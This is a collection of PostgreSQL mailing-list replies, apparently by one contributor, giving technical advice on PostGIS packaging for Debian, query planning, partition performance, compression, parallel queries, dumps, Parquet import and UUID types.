> https://www.postgresql.org/message-id/Rm7WBtZZpYL1NWuunuN_16EY0JcyejqV22z_JlUfvD5FYPenGDd_ZGUddwAcMNi2KNSyvqAhBRzj2JxtJoNmWAzykBQU4Z1AzBp0GPs8wZQ=@protonmail.com
>
> I was wondering if anyone can or will pay some active attention to it?
> i.e. what can I do from here to raise the message there to the attention
> of more people involved with pgsql-hackers, in order to get one or more
> active email replies in response to what I have posed/asked?
>
> *My email address is powerus...@live.com.au *,
>
> and my online name for the post is
>
> *Sergio Minervini*.
>
>
>

Re: postgis

2022-07-19 Thread Imre Samu

> I would like to install postgis 3.04 on a debian 11
> postgres 12.
> I may use whatever repo.
> I install postgres from postgresql.org...

As I see - from the official postgresql.org debian11 repo,
you can only install the "postgresql-12-postgis-3" package  ( now:
Postgis=3.2.1 )

docker run -it --rm postgres:12 bash
  apt update && apt search postgis | grep postgresql-12-postgis-3
   ---> *postgresql-12-postgis-3/bullseye-pgdg 3.2.1+dfsg-1.pgdg110+1 amd64*
  cat /etc/os-release | grep VERSION
   ---> VERSION="11 (bullseye)

Now the latest 3.0 version is http://postgis.net/2022/02/02/postgis-3.0.5/

regards,
  Imre

Marc Millas  ezt írta (időpont: 2022. júl. 18., H,
20:48):

> Hi,
> postgres 12.
> I may use whatever repo.
>
> I install postgres from postgresql.org...
>
>
>
> Marc MILLAS
> Senior Architect
> +33607850334
> www.mokadb.com
>
>
>
> On Mon, Jul 18, 2022 at 7:15 PM Adrian Klaver 
> wrote:
>
>> On 7/18/22 10:08, Marc Millas wrote:
>> > Hi,
>> >
>> > I would like to install postgis 3.04 on a debian 11.
>> >
>> > digging into various web sites, I didnt found the name of that packet.
>> >
>> > can someone help ?
>>
>> Should have added to previous response, what version of Postgres?
>> >
>> > thanks
>> >
>> > Marc MILLAS
>> > Senior Architect
>> > +33607850334
>> > www.mokadb.com 
>> >
>>
>>
>> --
>> Adrian Klaver
>> adrian.kla...@aklaver.com
>>
>

Re: postgis

2022-07-19 Thread Imre Samu

> from your message, I understand that for debian 11, I can NOT get any
3.0.x version.

I can't see any Postgis 3.0.x version
in the default *"http://apt.postgresql.org/pub/repos/apt/
<http://apt.postgresql.org/pub/repos/apt/> bullseye-pgdg main 12"*  repo


*root@6b22a4450d93:/# cat /etc/apt/sources.list.d/pgdg.listdeb [
signed-by=/usr/local/share/keyrings/postgres.gpg.asc ]
http://apt.postgresql.org/pub/repos/apt/
<http://apt.postgresql.org/pub/repos/apt/> bullseye-pgdg main 12*

If the version of PostGIS(3.0.x) is important for compatibility,
you should also pay attention to the version of the "geos" and "proj"
packages.

As I understand the debian *"**postgresql-12-postgis-3"* package is
continuously updated to the latest official postgis version.
( postgis 3.0 -> postgis 3.1 -> postgis 3.2  ... )
And the latest update was at 2022-02-14
https://www.postgresql.org/message-id/e1njy2b-0006m6...@atalia.postgresql.org


( My knowledge is limited .. )
and there is a dedicated Postgis mail list:
-  https://lists.osgeo.org/mailman/listinfo/postgis-users
and a Debian packaging mail list:
- https://www.postgresql.org/list/pgsql-pkg-debian/

Regards,
 Imre



Marc Millas  ezt írta (időpont: 2022. júl. 19., K,
20:20):

> Hi,
>
> from your message, I understand that for debian 11, I can NOT get any
> 3.0.x version.
> right ?
>
> Marc MILLAS
> Senior Architect
> +33607850334
> www.mokadb.com
>
>
>
> On Tue, Jul 19, 2022 at 7:20 PM Imre Samu  wrote:
>
>> > I would like to install postgis 3.04 on a debian 11
>> > postgres 12.
>> > I may use whatever repo.
>> > I install postgres from postgresql.org...
>>
>> As I see - from the official postgresql.org debian11 repo,
>> you can only install the "postgresql-12-postgis-3" package  ( now:
>> Postgis=3.2.1 )
>>
>> docker run -it --rm postgres:12 bash
>>   apt update && apt search postgis | grep postgresql-12-postgis-3
>>---> *postgresql-12-postgis-3/bullseye-pgdg 3.2.1+dfsg-1.pgdg110+1
>> amd64*
>>   cat /etc/os-release | grep VERSION
>>---> VERSION="11 (bullseye)
>>
>> Now the latest 3.0 version is
>> http://postgis.net/2022/02/02/postgis-3.0.5/
>>
>> regards,
>>   Imre
>>
>> Marc Millas  ezt írta (időpont: 2022. júl. 18.,
>> H, 20:48):
>>
>>> Hi,
>>> postgres 12.
>>> I may use whatever repo.
>>>
>>> I install postgres from postgresql.org...
>>>
>>>
>>>
>>> Marc MILLAS
>>> Senior Architect
>>> +33607850334
>>> www.mokadb.com
>>>
>>>
>>>
>>> On Mon, Jul 18, 2022 at 7:15 PM Adrian Klaver 
>>> wrote:
>>>
>>>> On 7/18/22 10:08, Marc Millas wrote:
>>>> > Hi,
>>>> >
>>>> > I would like to install postgis 3.04 on a debian 11.
>>>> >
>>>> > digging into various web sites, I didnt found the name of that packet.
>>>> >
>>>> > can someone help ?
>>>>
>>>> Should have added to previous response, what version of Postgres?
>>>> >
>>>> > thanks
>>>> >
>>>> > Marc MILLAS
>>>> > Senior Architect
>>>> > +33607850334
>>>> > www.mokadb.com <http://www.mokadb.com>
>>>> >
>>>>
>>>>
>>>> --
>>>> Adrian Klaver
>>>> adrian.kla...@aklaver.com
>>>>
>>>

Re: postgis

2022-07-20 Thread Imre Samu

> My general impression is that the packaging, at least for Debian,
> doesn’t actually understand how the PostGIS project handles versioning
support.
> But i may be missing something

"PostGIS Pre-built Binary Distributions for various OS"
--->  https://trac.osgeo.org/postgis/wiki/UsersWikiPackages

Debian is a conservative Linux.

IMHO:
Packaging is not so easy, [
https://trac.osgeo.org/postgis/wiki/UsersWikiPostgreSQLPostGIS  ]
- there are [n.=7] Postgres version [9.6,10,11,12,13,14,15 ]   [ now: all
supported in bullseye ]
- there are [g.=9 ] Geos version [3.3,3.4,3.5,3.6,3.7,3.8,3.9,3.10,3.11]  [
now: bullsey= 3.9.0 ]
- there are [p.=7 ] Proj version [ 4.8,4.9,5.x,6.x,7.x,8.x,9.x ][ now:
bullseye = 7.2.1 ]
- there are [d.= 7 ] Gdal version [ 2.4,3.0,3.1,3.2,3.3,3.4,3.5][ now:
bullseye = 3.2.2 ]
- there are [m.=5] Postgis version [2.4,2.5,3.0,3.1,3.2,3.3]   [now:
bullseye= 3.2.1 ]

And there are also projects based on PostGIS.
- Pgrouting [r.=7 ]   [2.3,2.4,2.5,2.6,3.0,3.1,3.2,3.3]  [ now:
bullseye= 3.3.0 ; postgresql-12-pgrouting ]

So the ideal "end user" combination =  n*g*p*d*m*r  = 7*9*7*7*5*7  = 108045

// disclaimer:   I am a Postgis user and a
https://github.com/postgis/docker-postgis contributor

Regards,
 Imre


David G. Johnston  ezt írta (időpont: 2022.
júl. 20., Sze, 16:58):

> On Wednesday, July 20, 2022, Marc Millas  wrote:
>
>> Thanks for your answer.
>> I would like to avoid compiling as much as possible.
>> I know that postgis 3.2.1 is available and does install without pb. but..
>> That db run an app which is very long to test, so I need to stick to a
>> postgis 3.0.x
>>
>
> I’m not particularly fluent here but working from the PostGIS project
> homepage and into the linked package archives I do not see where what you
> want exists.  It doesn’t seem like the 3.0.x series is being kept
> up-to-date in packaged form.
>
> But you may want to use PostGIS support channels to have a better chance
> at getting confirmation/help rather than here.
>
> My general impression is that the packaging, at least for Debian, doesn’t
> actually understand how the PostGIS project handles versioning support.
> But i may be missing something as I’m doing this web-only and
> apt.postgresql.org is basically impossible to inspect on the web.
>
> David J.
>
>

Re: postgis

2022-07-20 Thread Imre Samu

>  I would expect the 35 packages implied by the version policies of those
two projects.

Based on my docker-postgis support  - the "geos" is also important.
Now Bullseye(Debian11) geos version is 3.9 - and this is likely to continue
until the end of the cycle ( so no upgrade expected to 3.10,3.11)

And the  (next) Postgis 3.3.0 Release is not enabling all new features
with the current Bullseye - Geos version:
https://git.osgeo.org/gitea/postgis/postgis/raw/tag/3.3.0beta2/NEWS

*"This version requires PostgreSQL 11 or higher, GEOS 3.6 or higher, and
Proj 5.2+.*

*Additional features are enabled if you are running GEOS 3.9+ST_MakeValid
enhancements with 3.10+, *
*numerouse additional enhancements with GEOS 3.11+. *
*Requires SFCGAL 1.4.1+ for ST_AlphaShape and ST_OptimalAlphaShape.*
*"*

And Postgis 3.2 also has some enhancements working only with geos 3.10+  (
ST_MakeValid enhancements )
And "Bookworm" Debian12 expected  >= mid-2023.
so not easy ...

Imre


David G. Johnston  ezt írta (időpont: 2022.
júl. 20., Sze, 18:31):

> On Wed, Jul 20, 2022 at 9:21 AM Imre Samu  wrote:
>
>> > My general impression is that the packaging, at least for Debian,
>> > doesn’t actually understand how the PostGIS project handles versioning
>> support.
>> > But i may be missing something
>>
>> "PostGIS Pre-built Binary Distributions for various OS"
>> --->  https://trac.osgeo.org/postgis/wiki/UsersWikiPackages
>>
>> Debian is a conservative Linux.
>>
>> IMHO:
>> Packaging is not so easy, [
>> https://trac.osgeo.org/postgis/wiki/UsersWikiPostgreSQLPostGIS  ]
>> - there are [n.=7] Postgres version [9.6,10,11,12,13,14,15 ]   [ now: all
>> supported in bullseye ]
>> - there are [g.=9 ] Geos version [3.3,3.4,3.5,3.6,3.7,3.8,3.9,3.10,3.11]
>> [ now: bullsey= 3.9.0 ]
>> - there are [p.=7 ] Proj version [ 4.8,4.9,5.x,6.x,7.x,8.x,9.x ][
>> now: bullseye = 7.2.1 ]
>> - there are [d.= 7 ] Gdal version [ 2.4,3.0,3.1,3.2,3.3,3.4,3.5][
>> now: bullseye = 3.2.2 ]
>> - there are [m.=5] Postgis version [2.4,2.5,3.0,3.1,3.2,3.3]   [now:
>> bullseye= 3.2.1 ]
>>
>> And there are also projects based on PostGIS.
>> - Pgrouting [r.=7 ]   [2.3,2.4,2.5,2.6,3.0,3.1,3.2,3.3]  [ now:
>> bullseye= 3.3.0 ; postgresql-12-pgrouting ]
>>
>> So the ideal "end user" combination =  n*g*p*d*m*r  = 7*9*7*7*5*7  =
>> 108045
>>
>> // disclaimer:   I am a Postgis user and a
>> https://github.com/postgis/docker-postgis contributor
>>
>>>
>>>
> Yes, my expectation may be naive, but as the package name is
> "postgresql-[version]-postgis-[version]" I would expect the 35 packages
> implied by the version policies of those two projects.  So that one can
> choose their combination and focus on patch releases within those two named
> projects.  The OP seems to as well.  Or maybe a functional subset so that
> some number less than 35 may exist but, say, you cannot combine v14 and 3.0
> since 3.0 since 3.2 was the most recent release of PostGIS when PostgreSQL
> v14 came out.
>
> In any case it does sound like the request by the OP is not something the
> community has chosen to provide.  Which means a choice on their part - move
> up PostGIS or compile from source.
>
> David J.
>
>
>

Re: Same query, same data different plan

2022-10-10 Thread Imre Samu

> Ran analyze on both. Running the same query I'm getting different plans,
one x10 slower.

theory:

the "statistics target" is too low ?
THEN
different random sample  --> different statistics ---> different plan,.

*"For large tables, ANALYZE takes a random sample of the table contents,
rather than examining every row. "*
https://www.postgresql.org/docs/current/sql-analyze.html

IMHO:  Try to increase the statistics target   (
"default_statistics_target" , .. )

regards,
  Imre

Kostas Papadopoulos  ezt írta (időpont: 2022.
okt. 10., H, 14:56):

>
> I have two identical databases running in the same instance of Postgresql.
> Ran
> analyze on both. Running the same query I'm getting different plans, one
> x10 slower.
> Although I have solved my problem by re-writing the query, I want to
> understand why
> this is happening. If the configuration, Postgresql version, schema and
> data are the
> same, what other factors is the planner considering?
>
> --
>
> Kostas Papadopoulos
> KE MethodosIT
>
>
>
>

Re: partition table slow planning

2019-07-24 Thread Imre Samu

>*Can we know why this is happening?*

Please give us - more info about your system:
- PG version?
- number of partitions?
- any other important?

for example - in PG 11.2 Changes:
"Improve planning speed for large inheritance or partitioning table groups
(Amit Langote, Etsuro Fujita)"
https://www.postgresql.org/docs/current/release-11-2.html

Imre

Jatinder Sandhu  ezt írta (időpont:
2019. júl. 24., Sze, 9:22):

>
>
> We encounter a issue when we do query on partition table directly with
> proper partition key provide. postgres able to find problem partition but
> when I do explain plan it showing 95% spend on planning the execution .
> Here is example
> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary WHERE destination
> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
> itinerary-# ;
>
> QUERY PLAN
>
> ---
>  Append  (cost=0.29..13.79 rows=11 width=1024) (actual time=0.033..0.037
> rows=1 loops=1)
>->  Index Scan using itinerary_101_destination_departure_date_idx on
> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
> time=0.033..0.036 rows=1 loops=1)
>  Index Cond: (((destination)::text = 'GRJ'::text) AND
> ((departure_date)::text = '2020-01-01'::text))
>  Filter: (month_day = 101)
>
> * Planning Time: 51.677 ms* Execution Time: 0.086 ms
>
>
> When  I do query on directly on the partition table it is quite fast
> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary_101 WHERE destination
> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
> itinerary-# ;
>
>  QUERY PLAN
>
> -
>  Index Scan using itinerary_101_destination_departure_date_idx on
> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
> time=0.043..0.048 rows=1 loops=1)
>Index Cond: (((destination)::text = 'GRJ'::text) AND
> ((departure_date)::text = '2020-01-01'::text))
>Filter: (month_day = 101)
>
> * Planning Time: 0.191 ms* Execution Time: 0.074 ms
> (5 rows)
>
> itinerary=#
>
> *Can we know why this is happening?*
>
>
>
>
>
>

Re: partition table slow planning

2019-07-24 Thread Imre Samu

> PostgreSQL 11.3 ...   Total number of partition is 367  Partition
key: LIST

As I know:
in PG11 "Declarative Partitioning Best Practices"
*... " The query planner is generally able to handle partition hierarchies
with up to a few hundred partitions fairly well, provided that typical
queries allow the query planner to prune all but a small number of
partitions. Planning times become longer and memory consumption becomes
higher as more partitions are added." *
*... **"in this case, it may be better to choose to partition by HASH and
choose a reasonable number of partitions rather than trying to partition by
LIST"  *
*... "Never assume that more partitions are better than fewer partitions
and vice-versa."*

https://www.postgresql.org/docs/11/ddl-partitioning.html#DDL-PARTITIONING-DECLARATIVE-BEST-PRACTICES


In PG12 - it is more optimal:

*Changes:  "Improve performance of many operations on partitioned tables
(Amit Langote, David Rowley, Tom Lane, Álvaro Herrera) Allow tables with
thousands of child partitions to be processed efficiently by operations
that only affect a small number of partitions."  *
https://www.postgresql.org/docs/12/release-12.html#id-1.11.6.5.5
see more:
https://www.postgresql.org/message-id/flat/9d7c5112-cb99-6a47-d3be-cf1ee6862...@lab.ntt.co.jp


Imre





Jatinder Sandhu  ezt írta (időpont:
2019. júl. 24., Sze, 16:40):

>  PostgreSQL 11.3 (Ubuntu 11.3-1.pgdg18.04+1) on x86_64-pc-linux-gnu,
> compiled by gcc (Ubuntu 7.4.0-1ubuntu1~18.04) 7.4.0, 64-bit'
> Total number of partition is 367
>
> Parent table defination
>
>Table "public.itinerary"
>   Column   |Type | Collation | Nullable |
> Default
>
> ---+-+---+--+-
>  flight_query  | character varying(50)   |   | not null |
>  origin| character varying(5)|   | not null |
>  destination   | character varying(5)|   | not null |
>  departure_date| character varying(10)   |   | not null |
>  month_day | integer |   | not null |
>  journeys  | character varying(10485760) |   | not null |
>  origin_metro  | character varying(5)|   |  |
>  destination_metro | character varying(5)|   |  |
> Partition key: LIST (month_day)
>
>
>
> On Wed, Jul 24, 2019 at 5:16 AM Imre Samu  wrote:
>
>> >*Can we know why this is happening?*
>>
>> Please give us - more info about your system:
>> - PG version?
>> - number of partitions?
>> - any other important?
>>
>> for example - in PG 11.2 Changes:
>> "Improve planning speed for large inheritance or partitioning table
>> groups (Amit Langote, Etsuro Fujita)"
>> https://www.postgresql.org/docs/current/release-11-2.html
>>
>> Imre
>>
>> Jatinder Sandhu  ezt írta (időpont:
>> 2019. júl. 24., Sze, 9:22):
>>
>>>
>>>
>>> We encounter a issue when we do query on partition table directly with
>>> proper partition key provide. postgres able to find problem partition but
>>> when I do explain plan it showing 95% spend on planning the execution .
>>> Here is example
>>> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary WHERE destination
>>> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
>>> itinerary-# ;
>>>
>>>   QUERY PLAN
>>>
>>> ---
>>>  Append  (cost=0.29..13.79 rows=11 width=1024) (actual time=0.033..0.037
>>> rows=1 loops=1)
>>>->  Index Scan using itinerary_101_destination_departure_date_idx on
>>> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
>>> time=0.033..0.036 rows=1 loops=1)
>>>  Index Cond: (((destination)::text = 'GRJ'::text) AND
>>> ((departure_date)::text = '2020-01-01'::text))
>>>  Filter: (month_day = 101)
>>>
>>> * Planning Time: 51.677 ms* Execution Time: 0.086 ms
>>>
>>>
>>> When  I do query on directly on the partition table it is quite fast
>>> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary_101 WHERE
>>> destination ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
>>> itinerary-# ;
>>>
>>>QUERY PLAN
>>>
>>&

Re: Compression In Postgresql 9.6

2019-08-05 Thread Imre Samu

> because of specs of blockchain component.

Based on this schema (
https://grisha.org/blog/2017/12/15/blockchain-and-postgres/  AND
https://github.com/blkchain/pg_blkchain  )
and
IF  (your) blockchain component is using BYTEA everywhere  ( binary data
type : https://www.postgresql.org/docs/9.6/datatype-binary.html )
THEN ( imho) you can't expect lot of space saving.

>  Rhel 7.6.  . ...   There is a requirement for data compression

On RedHat (>=7.5)  you can test the new VDO compression layer
https://www.redhat.com/en/blog/look-vdo-new-linux-compression-layer
it is mentioned few weeks ago: "*... VDO compression for tables that are
less update intensive. "*
https://www.postgresql.org/message-id/20190718173424.gb25...@aart.rice.edu

on Postgres level - you can enable the "wal_compression"
-  https://www.postgresql.org/docs/9.6/runtime-config-wal.html
-
https://www.endpoint.com/blog/2017/03/28/postgres-wal-files-best-compression



regards,
Imre


Shital A  ezt írta (időpont: 2019. aug. 5., H,
8:30):

> Hello,
>
> Need inputs on below:
>
> We are working on a setting up a new highly transactional (tps 100k) OLTP
> system for payments using blockchain and postgresql 9.6 as DB on Rhel 7.6.
> Postgres version is 9.6 and not latest because of specs of blockchain
> component.
>
> There is a requirement for data compression on DB level. Please provide
> your inputs on how this can be best achieved.
>
> Checked in-build Toast, it compressed the data provided exceed the 2kb
> pagesize? If the data values are small and even if there are billion
> records they wont be compressed, this is what I understood.
>
> Are there any suggestions of compressing older data irrespective of row
> size transparently?
>
> Thanks.
>

Re: Slow statement using parallelism after 9.6>11 upgrade

2019-09-03 Thread Imre Samu

> We have upgraded our database from 9.6 to 11

This is now the latest PG ?   PG11.5?
( for example - in PG11.5 fixed: * "Fix failure to resolve deadlocks
involving multiple parallel worker processes"*
https://www.postgresql.org/docs/current/release-11-5.html )

> populated by the osm2pgsql program and updated on a daily basis.
> What runtime setting should I change to fix this, without losing the
benefit of parallelism ?

- the osm2pgsql has an own parallelizations ...  ( osm2pgsql
--number-processes .. )
   so be careful to add more parallelisation to the PG side with the same
osm2pgsql parameters !   ( check the memory usages! )
- check the benchmarks and the tunnings:
https://wiki.openstreetmap.org/wiki/Osm2pgsql/benchmarks
- you can ask help on the  : "osm dev mail list" (="dev OpenStreetMap
developer discusssion" https://lists.openstreetmap.org/listinfo/dev )

Imre




Arnaud L.  ezt írta (időpont: 2019. szept. 3., K,
14:11):

> Hi list
>
> We have upgraded our database from 9.6 to 11 (and updated PostGIS from
> 2.3 to 2.5 as well).
> We are using it among other things to store an OpenStreetMap database,
> populated by the osm2pgsql program and updated on a daily basis.
>
> The process used to take ~1h30 minutes before the upgrade, but after the
> upgrade it looks like it will never run to completion in a 24h time frame.
>
> The problem is apparently that the planner choses to run some statements
> in parallel, but these take a lot longer than when run without it.
> Here are the to explain analyze of the same statement, with parallelism
> on and off :
>
> Statement :
> PREPARE mark_ways_by_node(int8) AS select id from planet_osm_ways WHERE
> nodes && ARRAY[$1];
> EXPLAIN EXECUTE mark_ways_by_node(1);
>
>
> max_parallel_workers_per_gather = 2 :
>
> Gather  (cost=12545.61..2357352.25 rows=1420982 width=8) (actual
> time=2.577..64.028 rows=1 loops=1)
>Workers Planned: 2
>Workers Launched: 2
>->  Parallel Bitmap Heap Scan on planet_osm_ways
> (cost=11545.61..2214254.05 rows=592076 width=8) (actual
> time=0.213..0.213 rows=0 loops=3)
>  Recheck Cond: (nodes && '{1}'::bigint[])
>  Heap Blocks: exact=1
>  ->  Bitmap Index Scan on planet_osm_ways_nodes_idx
> (cost=0.00..11190.36 rows=1420982 width=0) (actual time=0.173..0.174
> rows=1 loops=1)
>Index Cond: (nodes && '{1}'::bigint[])
> Planning Time: 8.596 ms
> Execution Time: 64.135 ms
>
>
> max_parallel_workers_per_gather = 0 :
>
> Bitmap Heap Scan on planet_osm_ways  (cost=11545.61..3462154.46
> rows=1420982 width=8) (actual time=0.677..0.679 rows=1 loops=1)
>Recheck Cond: (nodes && '{1}'::bigint[])
>Heap Blocks: exact=1
>->  Bitmap Index Scan on planet_osm_ways_nodes_idx
> (cost=0.00..11190.36 rows=1420982 width=0) (actual time=0.268..0.268
> rows=1 loops=1)
>  Index Cond: (nodes && '{1}'::bigint[])
> Planning Time: 0.193 ms
> Execution Time: 0.773 ms
>
>
> So this Parallel Bitmap Heap Scan seems to be quite problematic here.
> What runtime setting should I change to fix this, without losing the
> benefit of parallelism ?
>
> Thanks a lot !
>
> Cheers
> --
> Arnaud
>
>
>

Re: Redis 16 times faster than Postgres?

2019-09-30 Thread Imre Samu

from the original article:
> For example, the PostgreSQL speeds depend on the Django ORM code
> that makes the SQL and sends the query and then turns it into the model
instance.
> I don't know what the proportions are between that and
> the actual bytes-from-PG's-disk times. But I'm not sure I care either.

imho:   the "Django ORM" is not so fast.
according to "TechEmpower Web Framework Benchmarks" ...
it has only  ~3% performance  -  compare to the best rust+pg (100%) results.

example:
"Data updates"
https://www.techempower.com/benchmarks/#section=data-r18&hw=ph&test=update
the "django-postgresql" performance = 766   - only 3.0% of the best pg +
rust results
checking the other test types (  "Single query" ;" Multiple queries" ) has
a similar results.

the Django implementation of the test:
https://github.com/TechEmpower/FrameworkBenchmarks/tree/master/frameworks/Python/django

Imre


Colin 't Hart  ezt írta (időpont: 2019. szept. 29.,
V, 23:42):

> Hi,
>
> Can someone take a look at this blog post?
> https://www.peterbe.com/plog/redis-vs-postgres-blob-of-json
>
> Can Redis really be 16 times faster than Postgres? Surely Postgres can get
> closer to the raw speed of the hardware than 1 order of magnitude?
>
> Thanks,
>
> Colin
>

Re: Regarding db dump with Fc taking very long time to completion

2019-10-16 Thread Imre Samu

Hi,

Maybe - you can re-use this backup tricks.

"Speeding up dump/restore process"
https://www.depesz.com/2009/09/19/speeding-up-dumprestore-process/

for example:
"""
*Idea was: All these tables had primary key based on serial. We could
easily get min and max value of the primary key column, and then split it
into half-a-million-ids “partitions", then dump them separately using:*
*psql -qAt -c "COPY ( SELECT * FROM TABLE WHERE id BETWEEN x AND y) TO
STDOUT" | gzip -c - > TABLE.x.y.dump*
"""

best,
Imre



Durgamahesh Manne  ezt írta (időpont: 2019. aug.
30., P, 11:51):

> Hi
> To respected international postgresql team
>
> I am using postgresql 11.4 version
> I have scheduled logical dump job which runs daily one time at db level
> There was one table that has write intensive activity for every 40 seconds
> in db
> The size of the table is about 88GB
>  Logical dump of that table is taking more than 7 hours to be completed
>
>  I need to reduce to dump time of that table that has 88GB in size
>
>
> Regards
> Durgamahesh Manne
>
>
>
>

Re: How to import Apache parquet files?

2019-11-05 Thread Imre Samu

>I would like to import (lots of) Apache parquet files to a PostgreSQL 11
cluster

imho: You have to check and test the Parquet FDW ( Parquet File Wrapper )
- https://github.com/adjust/parquet_fdw

Imre




Softwarelimits  ezt írta (időpont: 2019. nov. 5.,
K, 15:57):

> Hi, I need to come and ask here, I did not find enough information so I
> hope I am just having a bad day or somebody is censoring my search results
> for fun... :)
>
> I would like to import (lots of) Apache parquet files to a PostgreSQL 11
> cluster - yes, I believe it should be done with the Python pyarrow module,
> but before digging into the possible traps I would like to ask here if
> there is some common, well understood and documented tool that may be
> helpful with that process?
>
> It seems that the COPY command can import binary data, but I am not able
> to allocate enough resources to understand how to implement a parquet file
> import with that.
>
> I really would like follow a person with much more knowledge than me about
> either PostgreSQL or Apache parquet format instead of inventing a bad
> wheel.
>
> Any hints very welcome,
> thank you very much for your attention!
> John
>

Re: How should I specify work_mem/max_worker_processes if I want to do big queries now and then?

2019-11-21 Thread Imre Samu

>  uuid character varying(45) NOT NULL,

Just a comment.
IF this is a real UUID ( RFC 4122, ISO/IEC 9834-8:2005 ) ;
THEN you can use the built in  "UUID Type"
https://www.postgresql.org/docs/11/datatype-uuid.html


*"UUID would be the fastest because its 128 bits -> 16 bytes and
comparisons are done numerically."*
https://stackoverflow.com/questions/32189129/performance-difference-between-uuid-char-and-varchar-in-postgresql-table
The smaller size can be important for your index size ! :   *"quotes_pkey
PRIMARY KEY (symbol_id, uuid);"*

Imre


James(王旭)  ezt írta (időpont: 2019. nov. 20., Sze, 9:23):

>
> This is the schema:
>
> CREATE TABLE public.quotes (
> uuid character varying(45) NOT NULL,
> symbol_id smallint NOT NULL,
> symbol character varying(32) NOT NULL,
> p_open real NOT NULL,
> p_high real NOT NULL,
> p_low real NOT NULL,
> p_close real NOT NULL,
> amount numeric(20,2) NOT NULL,
> volume numeric(20,2) NOT NULL,
> pubdate timestamp with time zone NOT NULL,
> chunk_id smallint NOT NULL
> )
> PARTITION BY HASH (symbol_id);
> ALTER TABLE ONLY public.quotes
> ADD CONSTRAINT quotes_pkey PRIMARY KEY (symbol_id, uuid);
> CREATE INDEX idx_201911 ON ONLY public.quotes USING btree (symbol,
> chunk_id) WHERE (chunk_id >= 2595);
>
> 
>
> This is explain:
>
> EXPLAIN (ANALYZE, BUFFERS)  select p_open,p_close,p_high,p_low from quotes
> where symbol='MSFT' and chunk_id >= 2595;
>
>QUERY PLAN
>
>
> ---
> --
>  Append  (cost=0.42..22961.77 rows=12203 width=16) (actual
> time=1091.462..19600.454 rows=13286 loops=1)
>Buffers: shared hit=9 read=10065
>->  Index Scan using quotes_0_symbol_chunk_id_idx1 on quotes_0
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.295..0.295 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_1_symbol_chunk_id_idx1 on quotes_1
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.137..0.137 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_2_symbol_chunk_id_idx1 on quotes_2
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.117..0.117 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_3_symbol_chunk_id_idx1 on quotes_3
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.072..0.072 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=3
>->  Index Scan using quotes_4_symbol_chunk_id_idx1 on quotes_4
> (cost=0.42..8.43 rows=1 width=16) (act
> ual time=48.475..48.475 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_5_symbol_chunk_id_idx1 on quotes_5
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=45.995..45.995 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_6_symbol_chunk_id_idx1 on quotes_6
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=23.474..23.474 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_7_symbol_chunk_id_idx1 on quotes_7
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=67.030..67.030 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_8_symbol_chunk_id_idx1 on quotes_8
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=16.230..16.230 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_9_symbol_chunk_id_idx1 on quotes_9
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=24.758..24.758 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_10_symbol_chunk_id_idx1 on quotes_10
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=89.762..89.762 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_11_symbol_chunk_id_idx1 on quotes_11
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=54.779..54.779 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_12_symbol_chunk_id_idx1 on quotes_12
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=19.391..19.391 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=4
>->  Index Scan using quotes_13_symbol_chun

Re: 1 Status of vertical clustered index - 2 Join using (fk_constraint) suggestion - 3 Status of pgsql's parser autonomization

2020-02-16 Thread Imre Samu

>  3. What is the status of making the internal parser of PostgreSQL less
coupled to the core, and easier to cherry-pick from outside?

imho:
One of the current solutions is:  https://github.com/lfittl/libpg_query  C
library

"C library for accessing the PostgreSQL parser outside of the server.

This library uses the actual PostgreSQL server source to parse SQL queries
and return the internal PostgreSQL parse tree.Note that this is mostly
intended as a base library for

-  pg_query  (Ruby),

-  pg_query.go  (Go),

-  pg-query-parser  (Node),

-  psqlparse  (Python) and

-  pglast  (Python 3)."

"

Best,
 Imre



